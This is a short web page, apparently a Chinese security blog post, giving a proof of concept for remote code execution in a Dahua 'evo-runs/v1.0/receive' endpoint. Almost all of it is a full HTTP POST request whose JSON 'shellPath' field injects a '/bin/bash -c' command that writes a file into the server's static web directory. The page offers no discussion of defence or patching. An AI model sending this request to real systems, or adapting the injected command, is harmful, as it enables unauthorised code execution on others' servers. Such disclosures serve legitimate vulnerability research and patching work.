大华 evo-runs/v1.0/receive RCE

poc:

POST /evo-runs/v1.0/receive HTTP/1.1
Host: target_ip
Content-Type: application/json
Content-Length: 222
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
X-Subject-Headerflag: ADAPT

{
    "method": "agent.ossm.mapping.config",
    "info": {
        "configure": "test",
        "filePath": "test",
        "paramMap": {
            "shellPath": "/bin/bash -c 'echo test > /opt/evoWpms/static/test.txt'",
            "filePath": "test"
        },
        "requestIp": ""
    }
}

 

© 版权声明
THE END
喜欢就支持一下吧
点赞20赞赏 分享
评论 共2条

请登录后发表评论

    请登录后查看评论内容